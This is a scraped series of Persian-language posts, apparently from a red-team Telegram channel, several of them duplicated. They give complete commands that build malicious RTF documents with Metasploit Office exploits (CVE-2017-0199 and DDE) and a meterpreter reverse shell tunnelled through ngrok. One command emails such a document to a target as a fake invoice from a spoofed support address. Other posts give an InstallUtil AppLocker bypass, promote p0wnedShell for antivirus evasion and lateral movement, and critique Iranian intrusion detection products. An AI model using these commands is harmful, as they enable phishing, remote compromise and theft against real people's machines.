#RedTeam_CVE_2017-0199
در سناریو های #RT معمولا آسیب پذیری هایی که در خصوص فایل فرمت ها ارائه شده استفاده میشود,چرا که بسیاری از قربانیان محصولات نرم افزاری خودشون رو بروز نمیکنند, در نتیجه همچنان این دست حملات کارآمدی دارد
root@unk9vvn:~#
در سناریو های #RT معمولا آسیب پذیری هایی که در خصوص فایل فرمت ها ارائه شده استفاده میشود,چرا که بسیاری از قربانیان محصولات نرم افزاری خودشون رو بروز نمیکنند, در نتیجه همچنان این دست حملات کارآمدی دارد
root@unk9vvn:~#
apt-get install -y sendemail tor;service tor start;gnome-terminal --tab -e 'proxychains ngrok tcp 8443';NGROK_PORT=$(FUZ=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels | sed -nE 's/.*public_url":"tcp:\/\/0.tcp.ngrok.io:([^"]*).*/\1/p') && echo "$FUZ");sleep 5;msfconsole -qx "use exploit/windows/fileformat/office_word_hta;set PAYLOAD windows/x64/meterpreter/reverse_https;set LHOST 0.tcp.ngrok.io;set LPORT "$NGROK_PORT";set ReverseListenerBindAddress 127.0.0.1;set ReverseListenerBindPort 8443;set FILENAME product.rtf;set EnableStageEncoding true;exploit -j"
root@unk9vvn:~# mv /root/.msf4/local/product.rtf /root;sendEmail -f support@megacloud.com -t <Email-TARGET> -u "Invoice Attached" -m "Please Check Product" -a product.rtf -s <SMTP-SERVER> -v
@Unk9vvN#Office #DDE_Delivery
در پست قبلی در خصوص یک آسیب پذیری در فایل فرمت های Document Word رو توضیح دادیم, اما در این پست در خصوص یکی دیگر از این فایل فرمت ها که آسیب پذیری ذکر نشده اما فرمول #DDEAUTO میتونه منجر به فراخوانی پایلود یک COM Object بشه از روی C2 هکر و پایلود اجرا بشه, این هم یکی از پلن های #RT ها هستش
# Open terminal
root@unk9vvn:~#
@Unk9vvN
در پست قبلی در خصوص یک آسیب پذیری در فایل فرمت های Document Word رو توضیح دادیم, اما در این پست در خصوص یکی دیگر از این فایل فرمت ها که آسیب پذیری ذکر نشده اما فرمول #DDEAUTO میتونه منجر به فراخوانی پایلود یک COM Object بشه از روی C2 هکر و پایلود اجرا بشه, این هم یکی از پلن های #RT ها هستش
# Open terminal
root@unk9vvn:~#
apt-get install -y tor;service tor start;gnome-terminal --tab -e 'proxychains ngrok tcp 8443';NGROK_PORT=$(FUZ=$(curl --silent --show-error http://127.0.0.1:4040/api/tunnels | sed -nE 's/.*public_url":"tcp:\/\/0.tcp.ngrok.io:([^"]*).*/\1/p') && echo "$FUZ");sleep 5;msfconsole -qx "use windows/fileformat/office_dde_delivery;set PAYLOAD windows/x64/meterpreter/reverse_https;set LHOST 0.tcp.ngrok.io;set LPORT "$NGROK_PORT";set ReverseListenerBindAddress 127.0.0.1;set ReverseListenerBindPort 8443;set FILENAME product.rtf;set EnableStageEncoding true;exploit -j"
https://gist.github.com/xillwillx/171c24c8e23512a891910824f506f563#file-cactustorchddeauto-sh@Unk9vvN
#p0wnedShell
معرفی ابزار محبوب مخصوص #RT
برای مثال ابزار p0wnedShell که در خصوص عملیات های جمع آوری اطلاعات , اجرای کد در حافظه سیستم قربانی همراه با دور زدن آنتی ویروس ها, و همچنین پیاده سازی هفت روش در خصوص ارتقاء سطح دسترسی که دو نمونه آن بر بستر آسیب پذیری های Release شده از سیستم عامل ها هستش مانند آسیب پذیری Kerberos که با MS14-068 شناخته میشه,
همچنین این ابزار میتونه Stage های Metasploit رو برای شما تزریق کنه و به واسطه همین موضوع دسترسی Meterpreter رو برای شما به ارمغان بیاره, از دیگر ویژگی های این ابزار میشه به اجرای دستور بر بستر سرویس هایی مانند WMI و SMB اشاره کرد که عملیات Leteral Movement رو میتونید باهاش انجام بدید ,
/* Bypass AppLocker */
C:\Users\unk9vvn>
https://github.com/Cn33liz/p0wnedShell
@Unk9vvN
معرفی ابزار محبوب مخصوص #RT
برای مثال ابزار p0wnedShell که در خصوص عملیات های جمع آوری اطلاعات , اجرای کد در حافظه سیستم قربانی همراه با دور زدن آنتی ویروس ها, و همچنین پیاده سازی هفت روش در خصوص ارتقاء سطح دسترسی که دو نمونه آن بر بستر آسیب پذیری های Release شده از سیستم عامل ها هستش مانند آسیب پذیری Kerberos که با MS14-068 شناخته میشه,
همچنین این ابزار میتونه Stage های Metasploit رو برای شما تزریق کنه و به واسطه همین موضوع دسترسی Meterpreter رو برای شما به ارمغان بیاره, از دیگر ویژگی های این ابزار میشه به اجرای دستور بر بستر سرویس هایی مانند WMI و SMB اشاره کرد که عملیات Leteral Movement رو میتونید باهاش انجام بدید ,
/* Bypass AppLocker */
C:\Users\unk9vvn>
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\p0wnedShell\p0wnedShell\bin\Debug\p0wnedShell.exe
https://github.com/Cn33liz/p0wnedShell
@Unk9vvN
#APTSimulator
کمپانی NextronSystems یک Simulator در خصوص تمرین در خصوص پیاده سازی تکنیک های #RT در مقابل #Endpoint Detection ها و سیستم های مانیتورینگ که مامور شکار حملات و تکنیک های استفاده شده ی هکرها هستش,
از لینک زیر میتوانید این Simulator رو دانلود و بر روی یک سیستم عامل ویندوزی ترجیحا نسخه 10 با سطح دسترسی Administrator باز کرده و سناریو مورد نظر خودتون رو از لیست موجود انتخاب و اجرا کنید...
https://github.com/NextronSystems/APTSimulator/releases
@Unk9vvN
کمپانی NextronSystems یک Simulator در خصوص تمرین در خصوص پیاده سازی تکنیک های #RT در مقابل #Endpoint Detection ها و سیستم های مانیتورینگ که مامور شکار حملات و تکنیک های استفاده شده ی هکرها هستش,
از لینک زیر میتوانید این Simulator رو دانلود و بر روی یک سیستم عامل ویندوزی ترجیحا نسخه 10 با سطح دسترسی Administrator باز کرده و سناریو مورد نظر خودتون رو از لیست موجود انتخاب و اجرا کنید...
https://github.com/NextronSystems/APTSimulator/releases
@Unk9vvN
#Iranian #NIDS
شاید تا به حال برای شما هم این سوال هم مطرح شده است که شرکت های فعال در حوزه دفاع سایبری در ایران چه محصولات و مکانیزم هایی در خصوص مقابله با حملات سایبری اندیشیده اند, یکی از شرکت های فعال این حوزه امن افزار گستر شریف است که به پشتوانه دانشگاه شریف و خصولتی بودنش توانسته در ایران پیشتازی کند,
اما با یک بررسی اجمالی و مقایسه تدابیر این شرکت متوجه نواقصی هم شده ایم از جمله تکیه بیش از حد به مکانیزم های NIDS و MidPoint ها که بصورت اغراق آمیز بیان شده که میتواند انواع حملات را با درصد بالا ۹۰ شکار کند, این درحالیست که بسیاری از حملات سایبری APT در دنیا برپایه اکسپلویت هایی طراحی میشود که آمیخته با پروتکل های حیاطیست,
آیا دیوایس های ایرانی میتواند متوجه پایلود شدن یک پروتکل در لایه ماشین کد بشوند؟آن هم اگر برپایه مبهم سازی های باینری پی ریزی شده باشد, این تنها یک نمونه از ابهامات موجود است, محصولاتی مانند Sana-DFS یا Parham میتواند کارآمدی خوبی در مقابل حملات روتین و معمول نشان دهد, اما آیا برای تکنیک های بیشمار #RT هم کارآمدی و عملکرد دارد? بدلیل مخفی بودن محصولات جواب سوالات سخت است.
@Unk9vvN
شاید تا به حال برای شما هم این سوال هم مطرح شده است که شرکت های فعال در حوزه دفاع سایبری در ایران چه محصولات و مکانیزم هایی در خصوص مقابله با حملات سایبری اندیشیده اند, یکی از شرکت های فعال این حوزه امن افزار گستر شریف است که به پشتوانه دانشگاه شریف و خصولتی بودنش توانسته در ایران پیشتازی کند,
اما با یک بررسی اجمالی و مقایسه تدابیر این شرکت متوجه نواقصی هم شده ایم از جمله تکیه بیش از حد به مکانیزم های NIDS و MidPoint ها که بصورت اغراق آمیز بیان شده که میتواند انواع حملات را با درصد بالا ۹۰ شکار کند, این درحالیست که بسیاری از حملات سایبری APT در دنیا برپایه اکسپلویت هایی طراحی میشود که آمیخته با پروتکل های حیاطیست,
آیا دیوایس های ایرانی میتواند متوجه پایلود شدن یک پروتکل در لایه ماشین کد بشوند؟آن هم اگر برپایه مبهم سازی های باینری پی ریزی شده باشد, این تنها یک نمونه از ابهامات موجود است, محصولاتی مانند Sana-DFS یا Parham میتواند کارآمدی خوبی در مقابل حملات روتین و معمول نشان دهد, اما آیا برای تکنیک های بیشمار #RT هم کارآمدی و عملکرد دارد? بدلیل مخفی بودن محصولات جواب سوالات سخت است.
@Unk9vvN